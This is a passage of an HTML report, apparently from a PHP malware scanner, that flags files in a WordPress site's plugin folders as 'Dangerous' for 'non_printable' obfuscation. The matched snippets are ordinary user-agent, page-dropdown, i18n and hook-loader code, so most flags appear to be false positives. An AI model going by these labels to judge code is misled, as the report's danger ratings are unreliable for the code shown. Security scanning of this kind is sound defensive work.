<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_user_agent</span><span style="color: #007700">( </span><span style="color: #0000BB">$u_agent </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$empty</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_230").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/libs/UserAgent/UserAgentParser.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_231" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse</span><span style="color: #007700">( </span><span style="color: #0000BB">$u_agent </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) { </span><span style="color: #0000BB">$parsed </span><span style="color: #007700">= </span><span style="color: #0000BB">parse_user_agent</span><span style="color: #007700">(</span><span style="color: #0000BB">$u_agent</span><span style="color: #007700">); return new </span><span style="color: #0000BB">UserAgent</span><span style="color: #007700">( </span><span style="color: #0000BB">$parsed</span><span style="color: #007700">[</span><span style="color: #0000BB">PLATFORM</span><span style="color: #007700">], </span><span style="color: #0000BB">$parsed</span><span style="color: #007700">[</span><span style="color: #0000BB">BROWSER</span><span style="color: #007700">], </span><span style="color: #0000BB">$parsed</span><span style="color: #007700">[</span><span style="color: #0000BB">BROWSER_VERSION</span><span style="color: #007700">] ); } public function </span><span style="color: #0000BB">__invoke</span><span style="color: #007700">( </span><span style="color: #0000BB">$u_agent </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">parse</span><span style="color: #007700">(</span><span style="color: #0000BB">$u_agent</span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UserAgent an object with </span><span style="color: #DD0000">'browser'</span><span style="color: #007700">, </span><span style="color: #DD0000">'browserVersion' </span><span style="color: #007700">and </span><span style="color: #DD0000">'platform' </span><span style="color: #0000BB">methods</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse</span><span style="color: #007700">( </span><span style="color: #0000BB">$u_agent </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return new </span><span style="color: #0000BB">UserAgent</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__invoke</span><span style="color: #007700">( </span><span style="color: #0000BB">$u_agent </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">parse</span><span style="color: #007700">(</span><span style="color: #0000BB">$u_agent</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_231").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/libs/UserAgent/UserAgent.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_232" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">browserVersion</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">browserVersion</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$platform</span><span style="color: #007700">, </span><span style="color: #0000BB">$browser</span><span style="color: #007700">, </span><span style="color: #0000BB">$browserVersion </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">null</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">platform</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">platform</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">browser</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">browser</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">browserVersion</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">browserVersion</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_232").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/libs/UserAgent/UserAgentInterface.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 473.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_233" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">platform</span><span style="color: #007700">(); public function </span><span style="color: #0000BB">browser</span><span style="color: #007700">(); public function </span><span style="color: #0000BB">browserVersion</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">platform</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">browser</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">browserVersion</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">null</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_233").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/class.drop-down-pages.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.17 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_234" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">start_el</span><span style="color: #007700">(&</span><span style="color: #0000BB">$output</span><span style="color: #007700">, </span><span style="color: #0000BB">$object</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$current_object_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">) { if (!</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$output </span><span style="color: #007700">= array(); } </span><span style="color: #0000BB">$pad </span><span style="color: #007700">= </span><span style="color: #0000BB">str_repeat</span><span style="color: #007700">(</span><span style="color: #DD0000">'&nbsp;'</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">* </span><span style="color: #0000BB">3</span><span style="color: #007700">); </span><span style="color: #0000BB">$output</span><span style="color: #007700">[</span><span style="color: #0000BB">$object</span><span style="color: #007700">-></span><span style="color: #0000BB">ID</span><span style="color: #007700">] = </span><span style="color: #0000BB">$pad </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_html</span><span style="color: #007700">(</span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'list_pages'</span><span style="color: #007700">, </span><span style="color: #0000BB">$object</span><span style="color: #007700">-></span><span style="color: #0000BB">post_title</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">or </span><span style="color: #0000BB">HTML content</span><span style="color: #007700">, if </span><span style="color: #0000BB">not displaying</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'eps_dropdown_pages'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_dropdown_pages</span><span style="color: #007700">(</span><span style="color: #0000BB">$args </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_flip</span><span style="color: #007700">(</span><span style="color: #0000BB">eps_walk_page_dropdown_tree</span><span style="color: #007700">(</span><span style="color: #0000BB">$pages</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth</span><span style="color: #007700">, </span><span style="color: #0000BB">$r</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">description</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_walk_page_dropdown_tree</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">a heirarchical </span><span style="color: #007700">list </span><span style="color: #0000BB">of pages in a key</span><span style="color: #007700">-></span><span style="color: #0000BB">value pair</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$walker</span><span style="color: #007700">, </span><span style="color: #DD0000">'walk'</span><span style="color: #007700">), </span><span style="color: #0000BB">$args</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">start_el</span><span style="color: #007700">(&</span><span style="color: #0000BB">$output</span><span style="color: #007700">, </span><span style="color: #0000BB">$object</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$current_object_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_234").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/includes/class-protect-uploads-i18n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 684.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_235" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() { </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'/languages/' </span><span style="color: #007700">); } public function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain </span><span style="color: #007700">= </span><span style="color: #0000BB">$domain</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_235").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/eiaxb/includes/class-protect-uploads-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_236" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">filters </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">], array( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'component'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'accepted_args'</span><span style="color: #007700">] ); } foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">actions </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">],</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">definition on the $component</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should be fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
